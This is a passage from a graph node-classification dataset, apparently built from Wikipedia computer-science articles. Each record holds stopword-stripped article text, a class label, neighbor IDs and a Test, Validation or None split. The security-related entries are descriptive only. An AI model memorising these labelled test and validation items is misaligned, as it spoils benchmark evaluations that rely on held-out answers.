2005 shown bounded time-stamping schemes trusted audit party periodically reviews list time-stamps issued aggregation period made universally composable remain secure arbitrary environments compositions protocols instances time-stamping protocol buldas laur showed 2007 bounded time-stamping schemes secure strong sense satisfy so-called knowledge-binding condition security guarantee offered buldas saarepera 2004 improved diminishing security loss coefficient formula_1 formula_3 hash functions used secure time-stamping schemes necessarily collision-resistant even one-way secure time-stamping schemes probably possible even presence universal collision-finding algorithm i.e universal attacking program able find collisions hash function suggests possible find even stronger proofs based properties hash functions illustration hash tree based time-stamping system works rounds formula_4 formula_5 formula_6 ... one aggregation tree per round capacity system formula_1 determined tree size formula_8 formula_9 denotes binary tree depth current security proofs work assumption hard limit aggregation tree size possibly enforced subtree length restriction iso 18014 part 3 covers 'mechanisms producing linked tokens american national standard financial services trusted timestamp management security ansi asc x9.95 standard june 2005 covers linking-based hybrid time-stamping schemes ietf rfc standard draft linking based time-stamping rfc 4998 evidence record syntax encompasses hash tree time-stamp integrity guarantee long-term archiving",
    "neighbors": [
      9248,
      8674,
      11684,
      10831,
      5433
    ],
    "mask": "Test"
  },
  {
    "node_id": 3378,
    "label": 2,
    "text": "Open_(process):open process open nextstep macos command line process opens file folder url gui though user double clicked files opened default application type folders opened finder file system gui urls opened default browser",
    "neighbors": [
      5397,
      6797
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3379,
    "label": 7,
    "text": "GLite-AMGA:glite-amga arda metadata grid application amga general purpose metadata catalogue part european middleware initiative middleware distribution originally developed egee project part glite middleware became clear many grid applications needed metadata information files organize work-flow amga developed supported european middleware initiative amga metadata service allows users attach metadata information files stored grid metadata relationally organized data typically stored relational database system rdbms addition metadata amga also stored independently associated files allows amga used general access tool relational databases grid amga features simple learn metadata access language useful adoption amga smaller grid applications considerably lowers technical hurdle make use relational data access via sql92 also supported one main features amga one unique possibility replicate metadata different amga instances allowing federation metadata e.g health-e-child project also increase scalability improve access times globally deployed grid done wisdom project performance efficiency access across wans independently targeted access protocol optimised bulk transfer metadata across wans using data streaming security grid major concern amga features different authentication methods via grid-proxy- certificates well flexible accesses control mechanisms individual data items based acls particular security features made amga de facto standard metadata relational database access grid biomedical applications prominent projects making use amga field wisdom amga used campaigns avian flu malaria health e-child project",
    "neighbors": [
      3331,
      5956,
      3849,
      7983,
      8122
    ],
    "mask": "None"
  },
  {
    "node_id": 3380,
    "label": 2,
    "text": "XDA_Developers:xda developers xda developers also known simply xda often stylized xda-developers mobile software development community launched 20 december 2002 although discussion primarily revolves around android members also talk many operating systems mobile development topics many software hardware hacks rooting methods phone tablet specific tweaks originate members xda forum xda developers also hosts xda portal source android mobile phone development news well xda labs android app repository acts third-party application provider launched 2010 2016 respectively xda-developers.com created nah6 crypto products bv launched december 20th 2002 10 january 2011 xda-developers bought jb online media llc name xda developers originally derived xda marketed personal digital assistant pda extra features 2013 xda partnered swappa become official marketplace users buy sell devices site main purpose discussion troubleshooting development android sailfish os windows phone webos ubuntu touch firefox os tizen phones site also offers windows mobile android users general information devices rom upgrades technical support q reviews device applications accessories separate forums exist model phones manufactured google sony htc samsung lg electronics motorola nokia many others forums also available tablets many devices recently added new domain link shortener restricted devs joshua solan manages owns xda developers via company jb online media llc february 2009 microsoft asked xda developers remove roms created oems response petition raised signed 10,000 xda developers members petition put aside microsoft pursue removal customized images microsoft felt using custom images based roms originally provided microsoft acceptable roms work specific models portable devices original rom designed cnet asia suggested xda developers offers potential solutions problems many android-based mobile devices mobile phone reviews testers cnet preferred using xda developers roms carrying detailed reviews",
    "neighbors": [
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      8870,
      424,
      937,
      1578,
      6057,
      7595,
      10537,
      5431,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      711,
      456,
      11082,
      5963,
      332,
      4685,
      3664,
      2001,
      3409,
      8019,
      8280,
      5467,
      8285,
      8413,
      735,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      6001,
      5620,
      11252,
      7548,
      11391
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3381,
    "label": 4,
    "text": "Check_Point_GO:check point go check point go usb drive combines encrypted usb flash drive virtualization vpn computer security technologies turn pc secure corporate desktop plugging check point go usb port microsoft windows os-based pc laptop users launch secure virtual workspace segregated host pc allows users securely access company files applications remote location including insecure host environments hotel business center internet café check point go uses hardware software encryption protect user credentials documents sensitive data data compromised transit event device lost system uses authentication process enforces minimum levels password strength well certificates security tokens multifactor authentication remote connectivity device interfaces software corporate server support company policies security updates security gateways check point go formerly abra first introduced check point software technologies ltd. sandisk corporation march 2010 address security compliance issues companies remote employees workers increasingly demanding remote access company applications data personal equipment accessing network pose risk corporate networks creating potential avenue corporate data loss allowing unsecure connections companies cite check point go system provides solution companies want let employees purchase manage pcs laptops needing high security including encryption computing devices outside workplace well contractors/vendors require access company network working site since release product industry awards including product 2010 computerworld named one “ 25 hot products watch ” 2010 rsa conference crn magazine checkpoint go went end-of-sale 31-dec-2013 support ending 31-dec-2018 check point go inserted usb port pc user presented login screen upon successful login new explorer.exe instance started check point go secure workspace subsequent processes started child processes new explorer check point go uses software installed host pc run applications microsoft word microsoft excel user ’ documents remain secure check point go environment – virtual workspace runs parallel host environment file registry input/output calls secure application inside check point go redirected flash drive applications running check point go desktop including new explorer operate virtual file system registry virtual files registry data instantly written flash drive immediately encrypted currently check point go work windows workstations due incompatibility enterprise client settings",
    "neighbors": [
      2049,
      9764,
      8998,
      4972,
      3885,
      3629,
      6797,
      6262,
      5433,
      5435,
      8668,
      2558,
      4287
    ],
    "mask": "None"
  },
  {
    "node_id": 3382,
    "label": 6,
    "text": "Comparison_of_disk_encryption_software:comparison disk encryption software technical feature comparison different disk encryption software different modes operation supported software note encrypted volume use one mode operation",
    "neighbors": [
      2050,
      4100,
      7557,
      10631,
      4746,
      8331,
      4366,
      5391,
      8976,
      1810,
      3350,
      1052,
      1310,
      3109,
      10405,
      3880,
      1456,
      5552,
      434,
      10801,
      823,
      7354,
      7994,
      7229,
      704,
      8640,
      9281,
      6602,
      6993,
      9306,
      8283,
      8668,
      3422,
      8414,
      9055,
      9569,
      10850,
      7139,
      8676,
      9320,
      3314,
      7794,
      3572,
      5749,
      6519,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3383,
    "label": 5,
    "text": "Subnetwork_Access_Protocol:subnetwork access protocol subnetwork access protocol snap mechanism multiplexing networks using ieee 802.2 llc protocols distinguished 8-bit 802.2 service access point sap fields snap supports identifying protocols ethernet type field values also supports vendor-private protocol identifier spaces used ieee 802.3 ieee 802.4 ieee 802.5 ieee 802.11 ieee 802 physical network layers well non-ieee 802 physical network layers fddi use 802.2 llc snap lsap fields added packets transmitting node order allow receiving node pass received frame appropriate device driver understands given protocol open systems interconnect osi model uses sap define communication layers like network transport session layers seven-layered model identify protocol process incoming message within given layer programs exchange data mutually agreed upon protocol mechanism pair programs support common protocol communicate thus multiple protocols coexist within layer necessary determine protocol invoked process service data unit delivered lower layer common reference sap including source service access point ssap destination service access point dsap refers boundary data link layer network layer common think sap terms use layer 2 specifically logical link control llc sub-layer defined ieee 802.2 standards link service access point lsap includes destination service access point dsap source service access point ssap enables mac station communicate upper layers via different protocols standard network layer protocols assigned reserved llc addresses recorded iso/iec tr 11802-1 one half llc address space reserved assignment protocols accommodated two ways one way local assignment lsaps half llc address space available second way use particular reserved llc address value assigned use conjunction sub-network access protocol snap called snap address snap address identifies mac sap single lsap thus protocol using snap must employ protocol identifier thus subnetwork access protocol snap mechanism multiplexing networks using ieee 802.2 llc protocols distinguished 8-bit 802.2 service access point sap fields snap supports identifying protocols ethernet type field values also supports vendor-private protocol identifier spaces used ieee 802.3 ieee 802.4 ieee 802.5 ieee 802.11 ieee 802 physical network layers well non-ieee 802 physical network layers fddi use 802.2 llc snap extension 802.2 llc specified ieee 802 overview architecture document 5-octet snap header follows 802.2 llc header destination sap dsap source sap ssap contain hexadecimal values aa ab snap header consists 3-octet ieee organizationally unique identifier oui followed 2-octet protocol id oui hexadecimal 000000 protocol id ethernet type ethertype field value protocol running top snap oui oui particular organization protocol id value assigned organization protocol running top snap snap usually used unnumbered information 802.2 protocol data units pdus control field value 3 lsap values usually hexadecimal aa 802.2 llc header snap packet usually aa aa 03 however snap used pdu types well ethernet 8 octets occupied llc snap headers reduce size available payload protocols internet protocol 1492 bytes compared use ethernet ii framing therefore protocols ethertype values packets usually transmitted ethernet ii headers rather llc snap headers network types llc snap headers required order multiplex different protocols link layer mac layer n't ethertype field alternative framing would larger available payload one might ask separate sub-network header necessary answer augment decision made layout llc header time llc header designed thought single octet 256 possible values header would enough specify protocol values vendors would want register values began reserved discovered llc header would soon run open values hexadecimal aa ab values reserved additional header—the snap header—was developed support ethertype values well multiple spaces private protocol values per ietf rfc 1042 ip datagrams arp datagrams transmitted ieee 802 networks using llc snap headers except ethernet/ieee 802.3 transmitted ethernet ii headers per rfc 894",
    "neighbors": [
      2912,
      5472,
      751,
      2961,
      1618,
      2994,
      5270,
      5118,
      5439
    ],
    "mask": "Test"
  },
  {
    "node_id": 3384,
    "label": 5,
    "text": "Simple_Update_Protocol:simple update protocol simple update protocol sup protocol developed friendfeed simplify speed rss atom websites supported sup meaning updates services appeared friendfeed within seconds support dropped eventually friendfeed shutdown 2015-04-09 sites include disqus identi.ca reddit brightkite supported sup shutdown april 2012 youtube supported sup according youtube v2 api sup documentation yet reference says youtube data api v2 officially deprecated march 4 2014 youtube data api v3 supports push notifications via pubsubhubbub instead longer sup section",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3385,
    "label": 0,
    "text": "Lesk_algorithm:lesk algorithm lesk algorithm classical algorithm word sense disambiguation introduced michael e. lesk 1986 lesk algorithm based assumption words given neighborhood section text tend share common topic simplified version lesk algorithm compare dictionary definition ambiguous word terms contained neighborhood versions adapted use wordnet implementation might look like frequently used example illustrating algorithm context pine cone following dictionary definitions used seen best intersection pine 1 ⋂ cone 3 2 simplified lesk algorithm correct meaning word given context determined individually locating sense overlaps dictionary definition given context rather simultaneously determining meanings words given context approach tackles word individually independent meaning words occurring context comparative evaluation performed vasilescu et al 2004 shown simplified lesk algorithm significantly outperform original definition algorithm terms precision efficiency evaluating disambiguation algorithms senseval-2 english words data measure 58 precision using simplified lesk algorithm compared 42 original algorithm note vasilescu et al implementation considers back-off strategy words covered algorithm consisting frequent sense defined wordnet means words possible meanings lead zero overlap current context word definitions default assigned sense number one wordnet simplified lesk algorithm smart default word sense vasilescu et al. 2004 computeoverlap function returns number words common two sets ignoring function words words stop list original lesk algorithm defines context complex way unfortunately lesk ’ approach sensitive exact wording definitions absence certain word radically change results algorithm determines overlaps among glosses senses considered significant limitation dictionary glosses tend fairly short provide sufficient vocabulary relate fine-grained sense distinctions lot work appeared offering different modifications algorithm works use resources analysis thesauruses synonyms dictionaries morphological syntactic models instance may use information synonyms different derivatives words definitions words definitions lot studies concerning lesk extensions",
    "neighbors": [
      416,
      538,
      6304,
      3504
    ],
    "mask": "Test"
  },
  {
    "node_id": 3386,
    "label": 9,
    "text": "Object_file:object file object file file containing object code meaning relocatable format machine code usually directly executable various formats object files object code packaged different object files object file may also work like shared library addition object code object files may contain metadata used linking debugging including information resolve symbolic cross-references different modules relocation information stack unwinding information comments program symbols debugging profiling information object file format computer file format used storage object code related data many different object file formats originally type computer unique format advent unix portable operating systems formats coff elf defined used different kinds systems possible file format used linker input output thus library executable file format design and/or choice object file format key part overall system design affects performance linker thus programmer turnaround developing format used executables design also affects time programs take begin running thus responsiveness users object file formats structured separate sections data section containing certain type data sections known segments due term memory segment previously common form memory management program loaded memory loader loader allocates various regions memory program regions correspond segments object file thus usually known names others stack exist run time cases relocation done loader linker specify actual memory addresses however many programs architectures relocation necessary due handled memory management unit position-independent code systems segments object file copied paged memory executed without needing processing systems may done lazily segments referenced execution example via memory-mapped file backed object file types data supported typical object file formats segments different object files may combined linker according rules specified segments defined conventions exist segments shared object files instance dos different memory models specify names special segments whether may combined debugging information may either integral part object file format coff semi-independent format may used several object formats stabs dwarf gnu project binary file descriptor library bfd library provides common api manipulation object files variety formats",
    "neighbors": [
      1922,
      6020,
      8966,
      6664,
      6921,
      9996,
      10510,
      4884,
      8213,
      7204,
      8874,
      6829,
      4398,
      7728,
      5557,
      9921,
      2627,
      4424,
      5065,
      2762,
      1100,
      10703,
      1106,
      3410,
      3413,
      6753,
      8037,
      4712,
      10991,
      2672,
      9331,
      2804,
      5492,
      7421,
      2942,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 3387,
    "label": 2,
    "text": "Think_Blue_Linux:think blue linux think blue linux sometimes thinkblue linux port linux ibm s/390 later zseries mainframe computers done millenux subsidiary german company thinking objects software gmbh distribution consisted primarily collection red hat linux 6.1 packages rpms top ibm port linux kernel distribution product scheduled cease early 2006 packages date linux distributions support ibm mainframes modern linux distributions support ibm mainframes making special dedicated distribution unnecessary",
    "neighbors": [
      8837,
      9353,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      863,
      2914,
      485,
      3685,
      5096,
      4841,
      6890,
      7913,
      7020,
      9064,
      7534,
      2671,
      7920,
      8177,
      9074,
      10860,
      9461,
      6393,
      3323,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 3388,
    "label": 1,
    "text": "Data_access:data access data access generic term referring process it-specific meaning connotations involving access rights broader legal and/or political sense former typically refers software activities related storing retrieving acting data housed database repository two fundamental types data access exist data access crucially involves authorization access different data repositories data access help distinguish abilities administrators users example administrators may ability remove edit add data general users may even read rights lack access particular information historically repository including different database file system etc might require use different methods languages many repositories stored content different incompatible formats years standardized languages methods formats developed serve interfaces often proprietary always idiosyncratic specific languages methods standards include sql 1974- odbc ca 1990- jdbc xqj ado.net xml xquery xpath 1999- web services standards enable translation data unstructured html free-text files structured xml sql structures connection strings dburls attempt standardise methods connecting databases right_of_access_to_personal_data",
    "neighbors": [
      9762,
      10020,
      6775,
      2344,
      7175,
      7368,
      10413,
      6286,
      9263,
      6417,
      5202,
      2901,
      853,
      2775,
      3573,
      8446,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3389,
    "label": 9,
    "text": "AI_winter:ai winter history artificial intelligence ai winter period reduced funding interest artificial intelligence research term coined analogy idea nuclear winter field experienced several hype cycles followed disappointment criticism followed funding cuts followed renewed interest years decades later term first appeared 1984 topic public debate annual meeting aaai called american association artificial intelligence chain reaction begins pessimism ai community followed pessimism press followed severe cutback funding followed end serious research meeting roger schank marvin minsky—two leading ai researchers survived winter 1970s—warned business community enthusiasm ai spiraled control 1980s disappointment would certainly follow three years later billion-dollar ai industry began collapse hype common many emerging technologies railway mania dot-com bubble ai winter primarily collapse perception ai government bureaucrats venture capitalists despite rise fall ai reputation continued develop new successful technologies ai researcher rodney brooks would complain 2002 stupid myth ai failed ai around every second day 2005 ray kurzweil agreed many observers still think ai winter end story nothing since come ai field yet today many thousands ai applications deeply embedded infrastructure every industry enthusiasm optimism ai increased since low point early 1990s beginning 2012 artificial intelligence especially sub-field machine learning gained commercial acceptance funding increased dramatically two major winters 1974–1980 1987–1993 several smaller episodes including following cold war us government particularly interested automatic instant translation russian documents scientific reports government aggressively supported efforts machine translation starting 1954 outset researchers optimistic noam chomsky new work grammar streamlining translation process many predictions imminent 'breakthroughs however researchers underestimated profound difficulty word-sense disambiguation order translate sentence machine needed idea sentence otherwise made mistakes apocryphal example spirit willing flesh weak translated back forth russian became vodka good meat rotten similarly sight mind became blind idiot later researchers would call commonsense knowledge problem 1964 national research council become concerned lack progress formed automatic language processing advisory committee alpac look problem concluded famous 1966 report machine translation expensive less accurate slower human translation spending 20 million dollars nrc ended support careers destroyed research ended machine translation still open research problem 21st century met success google translate yahoo babel fish earliest work ai used networks circuits connected units simulate intelligent behavior examples kind work called connectionism include walter pitts warren mccullough first description neural network logic marvin minsky work snarc system late 1950s approaches abandoned researchers began explore symbolic reasoning essence intelligence following success programs like logic theorist general problem solver however one type connectionist work continued study perceptrons invented frank rosenblatt kept field alive salesmanship sheer force personality optimistically predicted perceptron may eventually able learn make decisions translate languages mainstream research perceptrons came abrupt end 1969 marvin minsky seymour papert published book perceptrons perceived outlining limits perceptrons could connectionist approaches abandoned next decade important work paul werbos discovery backpropagation continued limited way major funding connectionist projects difficult find 1970s early 1980s winter connectionist research came end middle 1980s work john hopfield david rumelhart others revived large scale interest neural networks rosenblatt live see however died boating accident shortly perceptrons published 1973 professor sir james lighthill asked uk parliament evaluate state ai research united kingdom report called lighthill report criticized utter failure ai achieve grandiose objectives concluded nothing done ai could n't done sciences specifically mentioned problem combinatorial explosion intractability implied many ai successful algorithms would grind halt real world problems suitable solving toy versions report contested debate broadcast bbc controversy series 1973 debate general purpose robot mirage royal institution lighthill versus team donald michie john mccarthy richard gregory mccarthy later wrote combinatorial explosion problem recognized ai beginning report led complete dismantling ai research england ai research continued universities edinburgh essex sussex created bow-wave effect led funding cuts across europe writes james hendler research would revive large scale 1983 alvey research project british government began fund ai war chest £350 million response japanese fifth generation project see alvey number uk-only requirements sit well internationally especially us partners lost phase 2 funding 1960s defense advanced research projects agency known arpa known darpa provided millions dollars ai research almost strings attached darpa director years j. c. r. licklider believed funding people projects allowed ai leaders marvin minsky john mccarthy herbert a. simon allen newell spend almost way liked attitude changed passage mansfield amendment 1969 required darpa fund mission-oriented direct research rather basic undirected research pure undirected research kind gone 1960s would longer funded darpa researchers show work would soon produce useful military technology ai research proposals held high standard situation helped lighthill report darpa study american study group suggested ai research unlikely produce anything truly useful foreseeable future darpa money directed specific projects identifiable goals autonomous tanks battle management systems 1974 funding ai projects hard find ai researcher hans moravec blamed crisis unrealistic predictions colleagues many researchers caught web increasing exaggeration initial promises darpa much optimistic course delivered stopped considerably short felt could n't next proposal promise less first one promised result moravec claims staff darpa lost patience ai research literally phrased darpa 'some people going taught lesson two-million-dollar-a-year contracts cut almost nothing moravec told daniel crevier autonomous tank project failure battle management system dynamic analysis replanning tool proved enormously successful saving billions first gulf war repaying darpas investment ai justifying darpa pragmatic policy darpa deeply disappointed researchers working speech understanding research program carnegie mellon university darpa hoped felt promised system could respond voice commands pilot sur team developed system could recognize spoken english words spoken particular order darpa felt duped 1974 cancelled three million dollar year grant many years later successful commercial speech recognition systems would use technology developed carnegie mellon team hidden markov models market speech recognition systems would reach 4 billion 2001 1980s form ai program called expert system adopted corporations around world first commercial expert system xcon developed carnegie mellon digital equipment corporation enormous success estimated saved company 40 million dollars six years operation corporations around world began develop deploy expert systems 1985 spending billion dollars ai in-house ai departments industry grew support including software companies like teknowledge intellicorp kee hardware companies like symbolics lisp machines inc. built specialized computers called lisp machines optimized process programming language lisp preferred language ai 1987 three years minsky schank prediction market specialized ai hardware collapsed workstations companies like sun microsystems offered powerful alternative lisp machines companies like lucid offered lisp environment new class workstations performance general workstations became increasingly difficult challenge lisp machines companies like lucid franz lisp offered increasingly powerful versions lisp example benchmarks published showing workstations maintaining performance advantage lisp machines later desktop computers built apple ibm would also offer simpler popular architecture run lisp applications 1987 become powerful expensive lisp machines desktop computers rule-based engines clips available alternatives left consumers reason buy expensive machine specialized running lisp entire industry worth half billion dollars replaced single year commercially many lisp companies failed like symbolics lisp machines inc. lucid inc. etc companies like texas instruments xerox abandoned field however number customer companies companies using systems written lisp developed lisp machine platforms continued maintain systems cases maintenance involved assumption resulting support work early 1990s earliest successful expert systems xcon proved expensive maintain difficult update could learn brittle i.e. could make grotesque mistakes given unusual inputs fell prey problems qualification problem identified years earlier research nonmonotonic logic expert systems proved useful special contexts another problem dealt computational hardness truth maintenance efforts general knowledge kee used assumption-based approach see nasa texsys supporting multiple-world scenarios difficult understand apply remaining expert system shell companies eventually forced downsize search new markets software paradigms like case-based reasoning universal database access maturation common lisp saved many systems icad found application knowledge-based engineering systems intellicorp kee moved lisp c++ variant pc helped establish object-oriented technology including providing major support development uml see uml partners 1981 japanese ministry international trade industry set aside 850 million fifth generation computer project objectives write programs build machines could carry conversations translate languages interpret pictures reason like human beings 1991 impressive list goals penned 1981 met indeed met 2001 2011 ai projects expectations run much higher actually possible 1983 response fifth generation project darpa began fund ai research strategic computing initiative originally proposed project would begin practical achievable goals even included artificial general intelligence long term objective program direction information processing technology office ipto also directed supercomputing microelectronics 1985 spent 100 million 92 projects underway 60 institutions half industry half universities government labs ai research generously funded sci jack schwarz ascended leadership ipto 1987 dismissed expert systems clever programming cut funding ai deeply brutally eviscerating sci schwarz felt darpa focus funding technologies showed promise words darpa surf rather dog paddle felt strongly ai next wave insiders program cited problems communication organization integration projects survived funding cuts including pilot assistant autonomous land vehicle never delivered dart battle management system noted successful survey reports early 2000s suggests ai reputation still less stellar many researchers ai mid 2000s deliberately called work names informatics machine learning analytics knowledge-based systems business rules management cognitive systems intelligent systems intelligent agents computational intelligence indicate work emphasizes particular tools directed particular sub-problem although may partly consider field fundamentally different ai also true new names help procure funding avoiding stigma false promises attached name artificial intelligence late 1990s early 21st century ai technology became widely used elements larger systems field rarely credited successes 2006 nick bostrom explained lot cutting edge ai filtered general applications often without called ai something becomes useful enough common enough labeled ai anymore rodney brooks stated around time stupid myth ai failed ai around every second day technologies developed ai researchers achieved commercial success number domains machine translation data mining industrial robotics logistics speech recognition banking software medical diagnosis google search engine fuzzy logic controllers developed automatic gearboxes automobiles 2006 audi tt vw touareg vw caravell feature dsp transmission utilizes fuzzy logic number škoda variants škoda fabia also currently include fuzzy logic-based controller camera sensors widely utilize fuzzy logic enable focus heuristic search data analytics technologies developed evolutionary computing machine learning subdivision ai research community techniques applied wide range real world problems considerable commercial success data analytics technology utilizing algorithms automated formation classifiers developed supervised machine learning community 1990s example tdidt support vector machines neural nets ibl used pervasively companies marketing survey targeting discovery trends features data sets researchers economists frequently judged status ai winter reviewing ai projects funded much trends funding often set major funding agencies developed world currently darpa civilian funding program called eu-fp7 provide much funding ai research us european union 2007 darpa soliciting ai research proposals number programs including grand challenge program cognitive technology threat warning system ct2ws human assisted neural devices sn07-43 autonomous real-time ground ubiquitous surveillance-imaging system argus-is urban reasoning geospatial exploitation technology urgent perhaps best known darpa grand challenge program developed fully automated road vehicles successfully navigate real world terrain fully autonomous fashion darpa also supported programs semantic web great deal emphasis intelligent management content automated understanding however james hendler manager darpa program time expressed disappointment government ability create rapid change moved working world wide web consortium transition technologies private sector eu-fp7 funding program provides financial support researchers within european union 2007–2008 funding ai research cognitive systems interaction robotics programme €193m digital libraries content programme €203m fet programme €185m marked increase ai funding development deployment commercial use led idea ai winter long concerns occasionally raised new ai winter could triggered overly ambitious unrealistic promise prominent ai scientists overpromising part commercial vendors several explanations put forth cause ai winters general ai progressed government-funded applications commercial ones new dynamics came play hype commonly cited cause explanations necessarily mutually exclusive ai winters partly understood sequence over-inflated expectations subsequent crash seen stock-markets exemplified railway mania dotcom bubble common pattern development new technology known hype cycle event typically technological breakthrough creates publicity feeds create peak inflated expectations followed trough disillusionment since scientific technological progress ca n't keep pace publicity-fueled increase expectations among investors stakeholders crash must follow ai technology seems exception rule another factor ai place organisation universities research ai often takes form interdisciplinary research ai therefore prone problems types interdisciplinary research face funding channeled established departments budget cuts tendency shield core contents department expense interdisciplinary less traditional research projects downturns country national economy cause budget cuts universities core contents tendency worsen effect ai research investors market likely put money less risky ventures crisis together may amplify economic downturn ai winter worth noting lighthill report came time economic crisis uk universities make cuts question programs go early computing history potential neural networks understood never realized fairly simple networks require significant computing capacity even today standards common see relationship basic research technology pipeline advances basic research give birth advances applied research turn leads new commercial applications often argued lack basic research lead drop marketable technology years line view advanced james hendler 2008 claimed fall expert systems late '80s due inherent unavoidable brittleness expert systems funding cuts basic research 1970s expert systems advanced 1980s applied research product development end decade pipeline run dry expert systems unable produce improvements could overcome brittleness secured funding fall lisp machine market failure fifth generation computers cases expensive advanced products overtaken simpler cheaper alternatives fits definition low-end disruptive technology lisp machine makers marginalized expert systems carried new desktop computers instance clips fall lisp machine market fall expert systems strictly speaking two separate events still failure adapt change outside computing milieu cited one reason 1980s ai winter several philosophers cognitive scientists computer scientists speculated ai might failed lies future hubert dreyfus highlighted flawed assumptions ai research past early 1966 correctly predicted first wave ai research would fail fulfill public promises making critics like noam chomsky argued ai headed wrong direction part heavy reliance statistical techniques chomsky comments fit larger debate peter norvig centered around role statistical methods ai exchange two started comments made chomsky symposium mit norvig wrote response",
    "neighbors": [
      7048,
      9975,
      9103,
      9231,
      538,
      10557,
      4799,
      9665,
      10320,
      10452,
      2901,
      7780,
      6502,
      8046,
      124,
      11255,
      10104,
      3323,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 3390,
    "label": 4,
    "text": "Anti-worm:anti-worm anti-worm sometimes helpful worm computer worm designed something author feels helpful though necessarily permission executing computer owner concept anti-worm helpful worm proactive method dealing virus computer worm outbreaks type worm delivers payload helpful actions instead malicious actions like malicious computer worms anti-worms reach computers scanning ip ranges placing copy vulnerable hosts anti-worm patches computer vulnerability uses affected computer find vulnerable hosts anti-worms ability spread fast regular computer worms utilizing scan infect repeat model malicious computer worms use anti-worms used combat effects code red blaster santy worms welchia example helpful worm utilizing deficiencies exploited blaster worm welchia infected computers automatically began downloading microsoft security updates windows without users consent welchia automatically reboots computers infects installing updates one updates patch fixed exploit examples helpful worms den_zuko cheeze codegreen millenium santy worm released shortly christmas 2004 spread quickly using google search vulnerable versions phpbb worm exploited bug phpbb software infect host defacing website deleting messages stored forums worm poised spread hundreds thousands websites running phpbb forum approximately 10 days worm launch someone released another worm combat santy worm patch vulnerable phpbb forum anti-santy worm spread quickly affecting thousands servers running phpbb anti-santy worm however caused problems many site administrators reported anti-worm crashed systems flooding requests resulting denial-of-service attack still others reported patch work whether anti-worm significant positive impact curtailing spread santy worm unknown within several hours santy release google blocked search string worm using find vulnerable hosts thus worm could find new hosts infect way determine google actions anti-santy worm protect hosts many computer security experts denounced so-called anti-worm position code run system without system owner consent even though anything malicious helpful worms log events automatically reboot computer without user consent part installation process put strain network spread download updates worm code even author good intentions wreak havoc network overflow traffic capacity network author know exact configuration systems code run could render system useless intended purpose jurisdictions computer crime laws covering worms distinguish worms anti-worms though factors take account considering whether prosecute author code",
    "neighbors": [
      2409,
      3852,
      6797,
      2041,
      2811,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3391,
    "label": 4,
    "text": "Cross-application_scripting:cross-application scripting cross-application scripting cas vulnerability affecting desktop applications n't check input exhaustive way cas allows attacker insert data modifies behaviour particular desktop application makes possible extract data inside users systems attackers may gain full privileges attacked application exploiting cas vulnerabilities attack degree independent underlying operating system hardware architecture initially discovered emanuele gentili presented two researchers alessandro scoscia emanuele acri participated study technique implications presented first time security summit 2010 milan format string attack similar concept attack cas could considered generalization attack method aspects technique previously demonstrated clickjacking techniques like web interfaces modern frameworks realization graphical applications particular gtk+ qt allow use tags inside widgets attacker gains possibility inject tags gains ability manipulate appearance behaviour application exactly phenomenon seen use cross-site scripting xss web pages kind behavior named cross-application scripting cas typically desktop applications get considerable amount input support large number features certainly web interface makes harder developer check whether input program might get untrusted sources filtered correctly cross-application scripting application equivalent xss web applications cross-application request forgery carf equivalent cross-site request forgery csrf desktop applications carf concept “ link ” “ protocol ” inherited web extended involves components graphical environment cases operating system exploiting vulnerabilities amenable csrf requires interaction user requirement n't particularly limiting user easily led execute certain actions graphical interface altered right way many misleading changes look applications obtained use cas new kind “ phishing ” whose dangerousness amplified lack tools detect kind attack outside websites emails contrast xss techniques manipulate later execute commands users browser cas possible talk directly operating system graphical interface",
    "neighbors": [
      2878,
      4198,
      7044,
      2470
    ],
    "mask": "Test"
  },
  {
    "node_id": 3392,
    "label": 4,
    "text": "ITIL_security_management:itil security management itil security management originally information technology infrastructure library describes structured fitting security organization itil security management based iso 27001 standard iso/iec 27001:2005 covers types organizations e.g commercial enterprises government agencies not-for profit organizations iso/iec 27001:2005 specifies requirements establishing implementing operating monitoring reviewing maintaining improving documented information security management system within context organization overall business risks specifies requirements implementation security controls customized needs individual organizations parts thereof iso/iec 27001:2005 designed ensure selection adequate proportionate security controls protect information assets give confidence interested parties basic concept security management information security primary goal information security control access information value information must protected values include confidentiality integrity availability inferred aspects privacy anonymity verifiability goal security management comes two parts slas define security requirements along legislation applicable contracts requirements act key performance indicators kpis used process management interpreting results security management process security management process relates itil-processes however particular section obvious relations relations service level management incident management change management processes security management continuous process compared w. edwards deming quality circle plan check act inputs requirements clients requirements translated security services security metrics client plan sub-process affect sla sla input client process provider develops security plans organization plans contain policies operational level agreements security plans plan implemented implementation evaluated check evaluation plans plan implementation maintained act activities results/products process documented external reports written sent clients clients able adapt requirements based information received reports furthermore service provider adjust plan implementation based findings order satisfy requirements stated sla including new requirements first activity security management process “ control ” sub-process control sub-process organizes manages security management process control sub-process defines processes allocation responsibility policy statements management framework security management framework defines sub-processes development implementation evaluations action plans furthermore management framework defines results reported clients meta-process model control sub-process based uml activity diagram gives overview activities control sub-process grey rectangle represents control sub-process smaller beam shapes inside represent activities take place inside meta-data model control sub-process based uml class diagram figure 2.1.2 shows metamodel control sub-process figure 2.1.2 meta-process model control sub-process control rectangle white shadow open complex concept means control rectangle consists collection sub concepts figure 2.1.3 process data model control sub-process shows integration two models dotted arrows indicate concepts created adjusted corresponding activities figure 2.1.3 process-data model control sub-process plan sub-process contains activities cooperation service level management lead information security section sla furthermore plan sub-process contains activities related underpinning contracts specific information security plan sub-process goals formulated sla specified form operational level agreements ola ola ’ defined security 